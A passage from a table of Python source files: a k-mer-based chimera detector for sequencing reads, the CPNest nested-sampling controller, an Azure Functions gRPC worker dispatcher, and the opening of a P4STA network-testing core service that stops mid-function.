source | python |
|---|---|
chimera_kmer_multiprocess.py | import multiprocessing
import os
from threading import Semaphore
import sys
import sourmash
import configparser
import screed
import re
import itertools
import copy
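# Matches abundance annotations such as ";size=123" in FASTA record names.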
rx_size = re.compile(r'size=(\d+)')
abskews = 2
k_size = 17
min_unmatched_k_mer = 30
total_account_for = 0.95
min_percentage = 0.001
kmer_dynamic = True
show_detail = False
padded = True
config_file = os.path.join(os.path.dirname(os.path.abspath(sys.argv[0])), 'chimera_kmer_multiprocess.config')
if os.path.exists(config_file):
config = configparser.ConfigParser()
config.read(config_file)
abskews = float(config['DEFAULT']['abskews'])
k_size = int(config['DEFAULT']['k_size'])
total_account_for = float(config['DEFAULT']['total_account_for'])
min_percentage = float(config['DEFAULT']['min_percentage'])
    kmer_dynamic = config['DEFAULT']['kmer_dynamic'] in ("True", "true")
    show_detail = config['DEFAULT']['show_detail'] in ("True", "true")
    padded = config['DEFAULT']['padded'] in ("True", "true")
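# Example chimera_kmer_multiprocess.config (a sketch; the section and key
# names come from the reads above, the values are only illustrative):
#
# [DEFAULT]
# abskews = 2
# k_size = 17
# total_account_for = 0.95
# min_percentage = 0.001
# kmer_dynamic = True
# show_detail = False
# padded = True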
def duo(e1, e2):
    """Split e2 into (hashes shared with e1, hashes left unexplained)."""
    e2_in_e1 = e2.intersection(e1)
    what_left = e2.difference(e1)
    return [e2_in_e1, what_left]
manager = multiprocessing.Manager()
in_queue = manager.Queue()
out_queue = manager.Queue()
detail_queue = manager.Queue()
writeLock = Semaphore(value=1)  # currently unused; the matching release() below is commented out
#filename = "/home/sih13/Downloads/cyano8_nonchimera.fasta"
filename = sys.argv[1]
#print (filename)
seqs = {}
names = []
sizes = []
with screed.open(filename) as seqfile:
for read in seqfile:
#print(read.name, read.sequence)
search_size = rx_size.search(read.name)
if search_size:
how_many_kmer = 1000
padded_sequence = read.sequence
            if padded:
                padded_sequence = "A" * k_size + read.sequence + "T" * k_size
            if kmer_dynamic:
                how_many_kmer = len(padded_sequence) - k_size + 1
E2 = sourmash.MinHash(n=how_many_kmer, ksize=k_size)
E2.add_sequence(padded_sequence)
e2 = set(E2.get_hashes())
seqs[read.name] = {"size": int(search_size.group(1)), "md5s": e2}
names.append(read.name)
sizes.append(int(search_size.group(1)))
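# Sort reads by abundance (ascending); a candidate parent must be more than
# `abskews` times as abundant as the query, so parents appear later on.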
sorted_name = [x for _,x in sorted(zip(sizes,names))]
sorted_size = [x for x,_ in sorted(zip(sizes,names))]
#print (sorted_size[:10])
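# Each worker greedily explains a query's k-mer hash set using more abundant
# reads: repeatedly pick the candidate that covers the largest remaining
# fraction of the query's hashes, subtract those hashes, and report the query
# as a potential chimera if at least two parents jointly cover at least
# `total_account_for` of it with no more than `min_unmatched_k_mer` hashes
# left unexplained.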
def work():
while True:
i = in_queue.get()
current_investigate_name = sorted_name[i]
current_investigate_size = sorted_size[i]
#print (i)
current_list = copy.deepcopy(sorted_name)
e2 = seqs[current_investigate_name]["md5s"]
#print ("current_investigate_name:", current_investigate_name)
del (current_list[i])
hit_list = []
coverages = []
#print (current_list)
while len(current_list) > 0 and len(e2) > k_size:
max_percentage = 0
max_percentage_name = ""
what_left = set()
#print (current_list)
            # Scan all remaining candidates; the abundance-skew check below
            # filters out reads that are not sufficiently more abundant.
            # (Starting at i + 1 skipped an entry and drifted once items were
            # removed from current_list.)
            for j in range(len(current_list)):
if seqs[current_list[j]]["size"] / current_investigate_size > abskews:
# E1 = sourmash.MinHash(n=(len(seqs[current_list[j]]["seq"]) - k_size + 1), ksize=k_size)
# E1.add_sequence(seqs[current_list[j]]["seq"])
#e1 = set(E1.get_hashes())
e1 = seqs[current_list[j]]["md5s"]
duo_result = duo(e1, e2)
overlap = len(duo_result[0]) / len(seqs[current_investigate_name]["md5s"])
if overlap > max_percentage and overlap >= min_percentage:
max_percentage = overlap
max_percentage_name = current_list[j]
what_left = duo_result[1]
if max_percentage_name != "":
current_list.remove(max_percentage_name)
e2 = what_left
hit_list.append(max_percentage_name)
coverages.append(max_percentage)
else:
break
        if show_detail:
detail_queue.put([current_investigate_name, hit_list, coverages])
#print (sum(coverages))
if len(coverages) >= 2 and sum(coverages) >= total_account_for and len(e2) <= min_unmatched_k_mer:
out_queue.put(current_investigate_name)
#print (to_delete_name)
#writeLock.release()
in_queue.task_done()
# Spawn a fixed pool of 5 daemon worker processes.
for i in range(5):
    t = multiprocessing.Process(target=work)
    t.daemon = True
    t.start()
for i in range(len(sorted_name)):
#print (sorted_name[i])
in_queue.put(i)
in_queue.join()
n = 0
if show_detail:
while not detail_queue.empty():
detail = detail_queue.get()
print (f"Query: {detail[0]}:\n")
for name, percentage in zip(detail[1], detail[2]):
print (f"{name}: {percentage}")
print ("\n\n")
detail_queue.task_done()
detail_queue.join()
while not out_queue.empty():
result = out_queue.get()
print (result)
n += 1
out_queue.task_done()
#print ("\n\n")
#out_queue.join()
print (f"There are {n} potential chimeras.")
#print (kmer_dynamic)
|
cpnest.py | #! /usr/bin/env python
# coding: utf-8
import multiprocessing as mp
from ctypes import c_double, c_int
import numpy as np
import os
import sys
import signal
from multiprocessing.sharedctypes import Value, Array
from multiprocessing import Lock
from multiprocessing.managers import SyncManager
import cProfile
class CheckPoint(Exception):
    """Raised from a signal handler to request checkpointing of the run."""
    pass
def sighandler(signal, frame):
print("Handling signal {}".format(signal))
raise CheckPoint()
class CPNest(object):
"""
Class to control CPNest sampler
cp = CPNest(usermodel,nlive=100,output='./',verbose=0,seed=None,maxmcmc=100,nthreads=None,balanced_sampling = True)
Input variables:
usermodel : an object inheriting cpnest.model.Model that defines the user's problem
nlive : Number of live points (100)
poolsize: Number of objects in the sampler pool (100)
output : output directory (./)
verbose: Verbosity, 0=silent, 1=progress, 2=diagnostic, 3=detailed diagnostic
seed: random seed (default: 1234)
maxmcmc: maximum MCMC points for sampling chains (100)
nthreads: number of parallel samplers. Default (None) uses mp.cpu_count() to autodetermine
nhamiltomnian: number of sampler threads using an hamiltonian samplers. Default: 0
resume: determines whether cpnest will resume a run or run from scratch. Default: False.
proposal: dictionary/list with custom jump proposals. key 'mhs' for the
Metropolis-Hastings sampler, 'hmc' for the Hamiltonian Monte-Carlo sampler. Default: None
n_periodic_checkpoint: int
checkpoint the sampler every n_periodic_checkpoint iterations
Default: None (disabled)
"""
def __init__(self,
usermodel,
nlive = 100,
poolsize = 100,
output = './',
verbose = 0,
seed = None,
maxmcmc = 100,
nthreads = None,
nhamiltonian = 0,
resume = False,
proposals = None,
n_periodic_checkpoint = None):
if nthreads is None:
self.nthreads = mp.cpu_count()
else:
self.nthreads = nthreads
print('Running with {0} parallel threads'.format(self.nthreads))
from .sampler import HamiltonianMonteCarloSampler, MetropolisHastingsSampler
from .NestedSampling import NestedSampler
from .proposal import DefaultProposalCycle, HamiltonianProposalCycle
if proposals is None:
proposals = dict(mhs=DefaultProposalCycle,
hmc=HamiltonianProposalCycle)
        elif isinstance(proposals, list):
proposals = dict(mhs=proposals[0],
hmc=proposals[1])
self.nlive = nlive
self.verbose = verbose
self.output = output
self.poolsize = poolsize
self.posterior_samples = None
self.manager = RunManager(nthreads=self.nthreads)
self.manager.start()
self.user = usermodel
self.resume = resume
        if seed is None:
            self.seed = 1234
        else:
            self.seed = seed
self.process_pool = []
# instantiate the nested sampler class
resume_file = os.path.join(output, "nested_sampler_resume.pkl")
        if not os.path.exists(resume_file) or not resume:
self.NS = NestedSampler(self.user,
nlive = nlive,
output = output,
verbose = verbose,
seed = self.seed,
prior_sampling = False,
manager = self.manager,
n_periodic_checkpoint = n_periodic_checkpoint)
else:
self.NS = NestedSampler.resume(resume_file, self.manager, self.user)
# instantiate the sampler class
for i in range(self.nthreads-nhamiltonian):
resume_file = os.path.join(output, "sampler_{0:d}.pkl".format(i))
            if not os.path.exists(resume_file) or not resume:
sampler = MetropolisHastingsSampler(self.user,
maxmcmc,
verbose = verbose,
output = output,
poolsize = poolsize,
seed = self.seed+i,
proposal = proposals['mhs'](),
resume_file = resume_file,
manager = self.manager
)
else:
sampler = MetropolisHastingsSampler.resume(resume_file,
self.manager,
self.user)
p = mp.Process(target=sampler.produce_sample)
self.process_pool.append(p)
for i in range(self.nthreads-nhamiltonian,self.nthreads):
resume_file = os.path.join(output, "sampler_{0:d}.pkl".format(i))
            if not os.path.exists(resume_file) or not resume:
sampler = HamiltonianMonteCarloSampler(self.user,
maxmcmc,
verbose = verbose,
output = output,
poolsize = poolsize,
seed = self.seed+i,
proposal = proposals['hmc'](model=self.user),
resume_file = resume_file,
manager = self.manager
)
else:
sampler = HamiltonianMonteCarloSampler.resume(resume_file,
self.manager,
self.user)
p = mp.Process(target=sampler.produce_sample)
self.process_pool.append(p)
def run(self):
"""
Run the sampler
"""
if self.resume:
signal.signal(signal.SIGTERM, sighandler)
signal.signal(signal.SIGALRM, sighandler)
signal.signal(signal.SIGQUIT, sighandler)
signal.signal(signal.SIGINT, sighandler)
signal.signal(signal.SIGUSR1, sighandler)
signal.signal(signal.SIGUSR2, sighandler)
#self.p_ns.start()
for each in self.process_pool:
each.start()
try:
self.NS.nested_sampling_loop()
for each in self.process_pool:
each.join()
except CheckPoint:
self.checkpoint()
sys.exit(130)
self.posterior_samples = self.get_posterior_samples(filename=None)
if self.verbose>1: self.plot()
#TODO: Clean up the resume pickles
def get_nested_samples(self, filename='nested_samples.dat'):
"""
returns nested sampling chain
Parameters
----------
filename : string
If given, file to save nested samples to
Returns
-------
pos : :obj:`numpy.ndarray`
"""
import numpy.lib.recfunctions as rfn
        self.nested_samples = rfn.stack_arrays(
            [s.asnparray() for s in self.NS.nested_samples],
            usemask=False)
        if filename:
            np.savetxt(os.path.join(
                self.NS.output_folder, filename),
                self.nested_samples.ravel(),
                header=' '.join(self.nested_samples.dtype.names),
                newline='\n', delimiter=' ')
return self.nested_samples
def get_posterior_samples(self, filename='posterior.dat'):
"""
Returns posterior samples
Parameters
----------
filename : string
If given, file to save posterior samples to
Returns
-------
pos : :obj:`numpy.ndarray`
"""
from .nest2pos import draw_posterior_many
nested_samples = self.get_nested_samples()
posterior_samples = draw_posterior_many([nested_samples],[self.nlive],verbose=self.verbose)
posterior_samples = np.array(posterior_samples)
# TODO: Replace with something to output samples in whatever format
        if filename:
            np.savetxt(os.path.join(
                self.NS.output_folder, filename),
                posterior_samples.ravel(),
                header=' '.join(posterior_samples.dtype.names),
                newline='\n', delimiter=' ')
return posterior_samples
def plot(self, corner = True):
"""
Make diagnostic plots of the posterior and nested samples
"""
pos = self.posterior_samples
from . import plot
for n in pos.dtype.names:
plot.plot_hist(pos[n].ravel(),name=n,filename=os.path.join(self.output,'posterior_{0}.png'.format(n)))
for n in self.nested_samples.dtype.names:
plot.plot_chain(self.nested_samples[n],name=n,filename=os.path.join(self.output,'nschain_{0}.png'.format(n)))
        plotting_posteriors = np.squeeze(pos.view((pos.dtype[0], len(pos.dtype.names))))
if corner: plot.plot_corner(plotting_posteriors,labels=pos.dtype.names,filename=os.path.join(self.output,'corner.png'))
def worker_sampler(self, producer_pipe, logLmin):
cProfile.runctx('self.sampler.produce_sample(producer_pipe, logLmin)', globals(), locals(), 'prof_sampler.prof')
def worker_ns(self):
cProfile.runctx('self.NS.nested_sampling_loop(self.consumer_pipes)', globals(), locals(), 'prof_nested_sampling.prof')
    def profile(self):
        # NOTE: relies on attributes (NUMBER_OF_PRODUCER_PROCESSES, queues,
        # port, authkey) that are not defined elsewhere in this class.
        for i in range(self.NUMBER_OF_PRODUCER_PROCESSES):
p = mp.Process(target=self.worker_sampler, args=(self.queues[i%len(self.queues)], self.NS.logLmin ))
self.process_pool.append(p)
        for i in range(self.NUMBER_OF_CONSUMER_PROCESSES):
p = mp.Process(target=self.worker_ns, args=(self.queues, self.port, self.authkey))
self.process_pool.append(p)
for each in self.process_pool:
each.start()
def checkpoint(self):
self.manager.checkpoint_flag=1
class RunManager(SyncManager):
def __init__(self, nthreads=None, **kwargs):
super(RunManager,self).__init__(**kwargs)
self.nconnected=mp.Value(c_int,0)
self.producer_pipes = list()
self.consumer_pipes = list()
for i in range(nthreads):
consumer, producer = mp.Pipe(duplex=True)
self.producer_pipes.append(producer)
self.consumer_pipes.append(consumer)
self.logLmin=None
self.nthreads=nthreads
def start(self):
super(RunManager, self).start()
self.logLmin = mp.Value(c_double,-np.inf)
self.checkpoint_flag=mp.Value(c_int,0)
def connect_producer(self):
"""
Returns the producer's end of the pipe
"""
with self.nconnected.get_lock():
n = self.nconnected.value
pipe = self.producer_pipes[n]
self.nconnected.value+=1
return pipe, n
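# Minimal usage sketch (names are illustrative; assumes a user-defined model
# inheriting cpnest.model.Model, as described in the CPNest docstring):
#
#   from cpnest.model import Model
#
#   class MyModel(Model):
#       ...  # define names, bounds, log_likelihood, ...
#
#   cp = CPNest(MyModel(), nlive=100, nthreads=2)
#   cp.run()
#   posterior = cp.posterior_samples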
|
dispatcher.py | """GRPC client.
Implements loading and execution of Python workers.
"""
import asyncio
import concurrent.futures
import logging
import queue
import threading
import traceback
import os
import grpc
import pkg_resources
from . import bindings
from . import functions
from . import loader
from . import protos
from . import constants
from .logging import error_logger, logger
class DispatcherMeta(type):
__current_dispatcher__ = None
@property
def current(mcls):
disp = mcls.__current_dispatcher__
if disp is None:
            raise RuntimeError('no currently running Dispatcher found')
return disp
class Dispatcher(metaclass=DispatcherMeta):
_GRPC_STOP_RESPONSE = object()
def __init__(self, loop, host, port, worker_id, request_id,
grpc_connect_timeout, grpc_max_msg_len):
self._loop = loop
self._host = host
self._port = port
self._request_id = request_id
self._worker_id = worker_id
self._functions = functions.Registry()
# A thread-pool for synchronous function calls. We limit
# the number of threads to 1 so that one Python worker can
# only run one synchronous function in parallel. This is
# because synchronous code in Python is rarely designed with
# concurrency in mind, so we don't want to allow users to
# have races in their synchronous functions. Moreover,
# because of the GIL in CPython, it rarely makes sense to
# use threads (unless the code is IO bound, but we have
# async support for that.)
self._sync_call_tp = concurrent.futures.ThreadPoolExecutor(
max_workers=1)
self._grpc_connect_timeout = grpc_connect_timeout
self._grpc_max_msg_len = grpc_max_msg_len
self._grpc_resp_queue: queue.Queue = queue.Queue()
self._grpc_connected_fut = loop.create_future()
self._grpc_thread = threading.Thread(
name='grpc-thread', target=self.__poll_grpc)
def load_bindings(self):
"""Load out-of-tree binding implementations."""
services = {}
for ep in pkg_resources.iter_entry_points('azure.functions.bindings'):
logger.info('Loading binding plugin from %s', ep.module_name)
ep.load()
return services
@classmethod
async def connect(cls, host, port, worker_id, request_id,
connect_timeout, max_msg_len=None):
loop = asyncio._get_running_loop()
disp = cls(loop, host, port, worker_id, request_id,
connect_timeout, max_msg_len)
disp._grpc_thread.start()
await disp._grpc_connected_fut
logger.info('Successfully opened gRPC channel to %s:%s', host, port)
return disp
async def dispatch_forever(self):
if DispatcherMeta.__current_dispatcher__ is not None:
raise RuntimeError(
'there can be only one running dispatcher per process')
self._old_task_factory = self._loop.get_task_factory()
loader.install()
DispatcherMeta.__current_dispatcher__ = self
try:
forever = self._loop.create_future()
self._grpc_resp_queue.put_nowait(
protos.StreamingMessage(
request_id=self.request_id,
start_stream=protos.StartStream(
worker_id=self.worker_id)))
self._loop.set_task_factory(
lambda loop, coro: ContextEnabledTask(coro, loop=loop))
logging_handler = AsyncLoggingHandler()
root_logger = logging.getLogger()
root_logger.setLevel(logging.INFO)
root_logger.addHandler(logging_handler)
try:
await forever
finally:
root_logger.removeHandler(logging_handler)
finally:
DispatcherMeta.__current_dispatcher__ = None
loader.uninstall()
self._loop.set_task_factory(self._old_task_factory)
self.stop()
def stop(self):
if self._grpc_thread is not None:
self._grpc_resp_queue.put_nowait(self._GRPC_STOP_RESPONSE)
self._grpc_thread.join()
self._grpc_thread = None
if self._sync_call_tp is not None:
self._sync_call_tp.shutdown()
self._sync_call_tp = None
def _on_logging(self, record: logging.LogRecord, formatted_msg: str):
if record.levelno >= logging.CRITICAL:
log_level = protos.RpcLog.Critical
elif record.levelno >= logging.ERROR:
log_level = protos.RpcLog.Error
elif record.levelno >= logging.WARNING:
log_level = protos.RpcLog.Warning
elif record.levelno >= logging.INFO:
log_level = protos.RpcLog.Information
elif record.levelno >= logging.DEBUG:
log_level = protos.RpcLog.Debug
else:
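            # 'None' is a Python keyword, so this RpcLog level has to be
            # looked up with getattr rather than normal attribute access.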
log_level = getattr(protos.RpcLog, 'None')
log = dict(
level=log_level,
message=formatted_msg,
category=record.name,
)
invocation_id = get_current_invocation_id()
if invocation_id is not None:
log['invocation_id'] = invocation_id
# XXX: When an exception field is set in RpcLog, WebHost doesn't
# wait for the call result and simply aborts the execution.
#
# if record.exc_info and record.exc_info[1] is not None:
# log['exception'] = self._serialize_exception(record.exc_info[1])
self._grpc_resp_queue.put_nowait(
protos.StreamingMessage(
request_id=self.request_id,
rpc_log=protos.RpcLog(**log)))
@property
def request_id(self):
return self._request_id
@property
def worker_id(self):
return self._worker_id
def _serialize_exception(self, exc):
try:
message = f'{type(exc).__name__}: {exc}'
except Exception:
message = (f'Unhandled exception in function. '
f'Could not serialize original exception message.')
try:
stack_trace = ''.join(traceback.format_tb(exc.__traceback__))
except Exception:
stack_trace = ''
return protos.RpcException(message=message, stack_trace=stack_trace)
async def _dispatch_grpc_request(self, request):
content_type = request.WhichOneof('content')
request_handler = getattr(self, f'_handle__{content_type}', None)
if request_handler is None:
# Don't crash on unknown messages. Some of them can be ignored;
# and if something goes really wrong the host can always just
# kill the worker's process.
logger.error(
f'unknown StreamingMessage content type {content_type}')
return
resp = await request_handler(request)
self._grpc_resp_queue.put_nowait(resp)
async def _handle__worker_init_request(self, req):
logger.info('Received WorkerInitRequest, request ID %s',
self.request_id)
capabilities = dict()
capabilities[constants.RAW_HTTP_BODY_BYTES] = "true"
return protos.StreamingMessage(
request_id=self.request_id,
worker_init_response=protos.WorkerInitResponse(
capabilities=capabilities,
result=protos.StatusResult(
status=protos.StatusResult.Success)))
async def _handle__function_load_request(self, req):
func_request = req.function_load_request
function_id = func_request.function_id
logger.info('Received FunctionLoadRequest, request ID: %s, '
'function ID: %s', self.request_id, function_id)
try:
func = loader.load_function(
func_request.metadata.name,
func_request.metadata.directory,
func_request.metadata.script_file,
func_request.metadata.entry_point)
self._functions.add_function(
function_id, func, func_request.metadata)
logger.info('Successfully processed FunctionLoadRequest, '
'request ID: %s, function ID: %s',
self.request_id, function_id)
return protos.StreamingMessage(
request_id=self.request_id,
function_load_response=protos.FunctionLoadResponse(
function_id=function_id,
result=protos.StatusResult(
status=protos.StatusResult.Success)))
except Exception as ex:
return protos.StreamingMessage(
request_id=self.request_id,
function_load_response=protos.FunctionLoadResponse(
function_id=function_id,
result=protos.StatusResult(
status=protos.StatusResult.Failure,
exception=self._serialize_exception(ex))))
async def _handle__invocation_request(self, req):
invoc_request = req.invocation_request
invocation_id = invoc_request.invocation_id
function_id = invoc_request.function_id
# Set the current `invocation_id` to the current task so
# that our logging handler can find it.
current_task = asyncio.Task.current_task(self._loop)
assert isinstance(current_task, ContextEnabledTask)
current_task.set_azure_invocation_id(invocation_id)
logger.info('Received FunctionInvocationRequest, request ID: %s, '
'function ID: %s, invocation ID: %s',
self.request_id, function_id, invocation_id)
try:
fi: functions.FunctionInfo = self._functions.get_function(
function_id)
args = {}
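            # Convert each incoming protobuf parameter into its Python binding
            # value, attaching trigger metadata to the trigger binding only.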
for pb in invoc_request.input_data:
pb_type_info = fi.input_types[pb.name]
if bindings.is_trigger_binding(pb_type_info.binding_name):
trigger_metadata = invoc_request.trigger_metadata
else:
trigger_metadata = None
args[pb.name] = bindings.from_incoming_proto(
pb_type_info.binding_name, pb.data,
trigger_metadata=trigger_metadata,
pytype=pb_type_info.pytype)
if fi.requires_context:
args['context'] = bindings.Context(
fi.name, fi.directory, invocation_id)
if fi.output_types:
for name in fi.output_types:
args[name] = bindings.Out()
if fi.is_async:
call_result = await fi.func(**args)
else:
call_result = await self._loop.run_in_executor(
self._sync_call_tp,
self.__run_sync_func, invocation_id, fi.func, args)
if call_result is not None and not fi.has_return:
raise RuntimeError(
f'function {fi.name!r} without a $return binding '
f'returned a non-None value')
output_data = []
if fi.output_types:
for out_name, out_type_info in fi.output_types.items():
val = args[out_name].get()
if val is None:
# TODO: is the "Out" parameter optional?
# Can "None" be marshaled into protos.TypedData?
continue
rpc_val = bindings.to_outgoing_proto(
out_type_info.binding_name, val,
pytype=out_type_info.pytype)
assert rpc_val is not None
output_data.append(
protos.ParameterBinding(
name=out_name,
data=rpc_val))
return_value = None
if fi.return_type is not None:
return_value = bindings.to_outgoing_proto(
fi.return_type.binding_name, call_result,
pytype=fi.return_type.pytype)
logger.info('Successfully processed FunctionInvocationRequest, '
'request ID: %s, function ID: %s, invocation ID: %s',
self.request_id, function_id, invocation_id)
return protos.StreamingMessage(
request_id=self.request_id,
invocation_response=protos.InvocationResponse(
invocation_id=invocation_id,
return_value=return_value,
result=protos.StatusResult(
status=protos.StatusResult.Success),
output_data=output_data))
except Exception as ex:
return protos.StreamingMessage(
request_id=self.request_id,
invocation_response=protos.InvocationResponse(
invocation_id=invocation_id,
result=protos.StatusResult(
status=protos.StatusResult.Failure,
exception=self._serialize_exception(ex))))
async def _handle__function_environment_reload_request(self, req):
try:
logger.info('Received FunctionEnvironmentReloadRequest, '
'request ID: %s', self.request_id)
func_env_reload_request = req.function_environment_reload_request
os.environ.clear()
env_vars = func_env_reload_request.environment_variables
for var in env_vars:
os.environ[var] = env_vars[var]
success_response = protos.FunctionEnvironmentReloadResponse(
result=protos.StatusResult(
status=protos.StatusResult.Success))
return protos.StreamingMessage(
request_id=self.request_id,
function_environment_reload_response=success_response)
except Exception as ex:
failure_response = protos.FunctionEnvironmentReloadResponse(
result=protos.StatusResult(
status=protos.StatusResult.Failure,
exception=self._serialize_exception(ex)))
return protos.StreamingMessage(
request_id=self.request_id,
function_environment_reload_response=failure_response)
def __run_sync_func(self, invocation_id, func, params):
# This helper exists because we need to access the current
# invocation_id from ThreadPoolExecutor's threads.
_invocation_id_local.v = invocation_id
try:
return func(**params)
finally:
_invocation_id_local.v = None
def __poll_grpc(self):
options = []
if self._grpc_max_msg_len:
options.append(('grpc.max_receive_message_length',
self._grpc_max_msg_len))
options.append(('grpc.max_send_message_length',
self._grpc_max_msg_len))
channel = grpc.insecure_channel(
f'{self._host}:{self._port}', options)
try:
grpc.channel_ready_future(channel).result(
timeout=self._grpc_connect_timeout)
except Exception as ex:
self._loop.call_soon_threadsafe(
self._grpc_connected_fut.set_exception, ex)
return
else:
self._loop.call_soon_threadsafe(
self._grpc_connected_fut.set_result, True)
stub = protos.FunctionRpcStub(channel)
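        # Bridge the thread-safe response queue into the bidirectional gRPC
        # stream; the stop sentinel cancels the stream during shutdown.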
def gen(resp_queue):
while True:
msg = resp_queue.get()
if msg is self._GRPC_STOP_RESPONSE:
grpc_req_stream.cancel()
return
yield msg
grpc_req_stream = stub.EventStream(gen(self._grpc_resp_queue))
try:
for req in grpc_req_stream:
self._loop.call_soon_threadsafe(
self._loop.create_task, self._dispatch_grpc_request(req))
except Exception as ex:
if ex is grpc_req_stream:
# Yes, this is how grpc_req_stream iterator exits.
return
error_logger.exception('unhandled error in gRPC thread')
raise
class AsyncLoggingHandler(logging.Handler):
    def emit(self, record):
        # Worker-internal logs ('azure.functions_worker*') are not forwarded.
        if not record.name.startswith('azure.functions_worker'):
            msg = self.format(record)
Dispatcher.current._on_logging(record, msg)
class ContextEnabledTask(asyncio.Task):
_AZURE_INVOCATION_ID = '__azure_function_invocation_id__'
def __init__(self, coro, loop):
super().__init__(coro, loop=loop)
current_task = asyncio.Task.current_task(loop)
if current_task is not None:
invocation_id = getattr(
current_task, self._AZURE_INVOCATION_ID, None)
if invocation_id is not None:
self.set_azure_invocation_id(invocation_id)
def set_azure_invocation_id(self, invocation_id):
setattr(self, self._AZURE_INVOCATION_ID, invocation_id)
def get_current_invocation_id():
loop = asyncio._get_running_loop()
if loop is not None:
current_task = asyncio.Task.current_task(loop)
if current_task is not None:
return getattr(
current_task, ContextEnabledTask._AZURE_INVOCATION_ID, None)
return getattr(_invocation_id_local, 'v', None)
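# Thread-local slot used by Dispatcher.__run_sync_func to expose the current
# invocation id to synchronous functions running in the thread pool.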
_invocation_id_local = threading.local()
|
core.py | # Copyright 2019-present Ralf Kundel, Fridolin Siegmund
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import importlib
import json
import os
import rpyc
import shutil
import subprocess
import sys
import time
import threading
import traceback
from pathlib import Path
from tabulate import tabulate
import P4STA_utils
dir_path = os.path.dirname(os.path.realpath(__file__))
project_path = dir_path[0:dir_path.find("/core")]
sys.path.append(project_path)
try:
    from analytics import analytics
except Exception as e:
    # prevent PEP8 warning; the sys.path.append must come before this import
    raise e
first_run = False
class P4staCore(rpyc.Service):
all_targets = {}
all_extHosts = {}
all_loadGenerators = {}
measurement_id = -1 # will be set when external host is started
method_return = None
def get_project_path(self):
return project_path
def __init__(self):
global first_run
first_run = False
print("init p4sta core")
P4STA_utils.set_project_path(project_path)
# Find installed Targets
fullpath = os.path.join(project_path, "stamper_targets")
dirs = [d for d in os.listdir(fullpath) if
os.path.isdir(os.path.join(fullpath, d))]
        for d in dirs:
            config_path = os.path.join(fullpath, d, "target_config.json")
            if os.path.isfile(config_path):
                # we found a target
                with open(config_path, "r") as f:
                    cfg = json.load(f)
                cfg["real_path"] = os.path.join(fullpath, d)
                self.all_targets.update({cfg["target"]: cfg})
# Find installed extHosts
fullpath = os.path.join(project_path, "extHost")
dirs = [d for d in os.listdir(fullpath) if
os.path.isdir(os.path.join(fullpath, d))]
        for d in dirs:
            config_path = os.path.join(fullpath, d, "extHost_config.json")
            if os.path.isfile(config_path):
                # we found an extHost
                with open(config_path, "r") as f:
                    cfg = json.load(f)
                cfg["real_path"] = os.path.join(fullpath, d)
                self.all_extHosts.update({cfg["name"]: cfg})
fullpath = os.path.join(project_path, "loadGenerators")
dirs = [d for d in os.listdir(fullpath) if
os.path.isdir(os.path.join(fullpath, d))]
        for d in dirs:
            config_path = os.path.join(fullpath, d,
                                       "loadGenerator_config.json")
            if os.path.isfile(config_path):
                # we found a load generator
                with open(config_path, "r") as f:
                    cfg = json.load(f)
                cfg["real_path"] = os.path.join(fullpath, d)
                self.all_loadGenerators.update({cfg["name"]: cfg})
print(self.all_loadGenerators)
self.check_first_run()
def check_first_run(self):
global first_run
if P4STA_utils.read_current_cfg() is None:
print("config.json not found. Creating new one from empty "
"bmv2 template.")
path = self.get_template_cfg_path("bmv2")
if not os.path.exists(os.path.join(project_path, "data")):
# create data directory if not exist
os.makedirs(os.path.join(project_path,
"data"))
with open(path, "r") as f:
cfg = json.load(f)
P4STA_utils.write_config(cfg)
first_run = True
return first_run
def first_run_finished(self):
global first_run
first_run = False
def write_install_script(self, first_time_cfg):
install_script = []
if "stamper_user" in first_time_cfg:
stamper_name = first_time_cfg["selected_stamper"]
stamper_target = self.get_stamper_target_obj(stamper_name)
if "target_specific_dict" in first_time_cfg:
target_specific_dict = first_time_cfg["target_specific_dict"]
else:
target_specific_dict = {}
install_script.extend(stamper_target.get_server_install_script(
user_name=first_time_cfg["stamper_user"],
ip=first_time_cfg["stamper_ssh_ip"],
target_specific_dict=target_specific_dict))
install_script.append("")
if "ext_host_user" in first_time_cfg:
ext_host_name = first_time_cfg["selected_extHost"]
ext_host = self.get_extHost_obj(ext_host_name)
install_script.extend(ext_host.get_server_install_script(
user_name=first_time_cfg["ext_host_user"],
ip=first_time_cfg["ext_host_ssh_ip"]))
install_script.append("")
loadgen = self.get_loadgen_obj(first_time_cfg["selected_loadgen"])
install_script.extend(
loadgen.get_server_install_script(first_time_cfg["loadgens"]))
with open("install_server.sh", "w") as f:
for line in install_script:
f.write(line + "\n")
f.close()
os.chmod("install_server.sh", 0o775)
# returns an instance of current selected target config object
def get_stamper_target_obj(self, target_name):
target_description = self.all_targets[target_name]
path_to_driver = (os.path.join(target_description["real_path"],
target_description["target_driver"]))
spec = importlib.util.spec_from_file_location("TargetImpl",
path_to_driver)
foo = importlib.util.module_from_spec(spec)
spec.loader.exec_module(foo)
        stamper_target_obj = foo.TargetImpl(target_description)
        stamper_target_obj.setRealPath(target_description["real_path"])
        return stamper_target_obj
def get_extHost_obj(self, name):
host_description = self.all_extHosts[name]
path_to_driver = (os.path.join(host_description["real_path"],
host_description["driver"]))
spec = importlib.util.spec_from_file_location("ExtHostImpl",
path_to_driver)
foo = importlib.util.module_from_spec(spec)
spec.loader.exec_module(foo)
        ext_host_obj = foo.ExtHostImpl(host_description)
        ext_host_obj.setRealPath(host_description["real_path"])
        return ext_host_obj
def get_current_extHost_obj(self):
return self.get_extHost_obj(
P4STA_utils.read_current_cfg()["selected_extHost"])
# returns an instance of current selected load generator object
def get_loadgen_obj(self, name):
loadgen_description = self.all_loadGenerators[name]
path_to_driver = (os.path.join(loadgen_description["real_path"],
loadgen_description["driver"]))
spec = importlib.util.spec_from_file_location("LoadGeneratorImpl",
path_to_driver)
foo = importlib.util.module_from_spec(spec)
spec.loader.exec_module(foo)
        loadgen_obj = foo.LoadGeneratorImpl(loadgen_description)
        loadgen_obj.setRealPath(loadgen_description["real_path"])
        return loadgen_obj
    def get_all_extHost(self):
        return list(self.all_extHosts.keys())
    def get_all_targets(self):
        return list(self.all_targets.keys())
    def get_all_loadGenerators(self):
        return list(self.all_loadGenerators.keys())
def get_target_cfg(self, target_name=""):
try:
if target_name == "":
